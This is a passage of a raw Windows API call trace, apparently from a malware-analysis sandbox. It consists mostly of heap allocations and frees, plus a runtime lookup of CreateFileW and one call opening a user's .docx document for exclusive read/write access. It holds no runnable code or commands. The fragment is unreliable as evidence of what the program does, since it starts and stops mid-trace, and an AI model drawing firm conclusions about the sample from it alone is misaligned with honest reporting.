hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.495] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0177.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.499] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0xbd7080 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0177.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\8kaz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd7080 | out: hHeap=0x8a0000) returned 1 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.501] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.502] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, 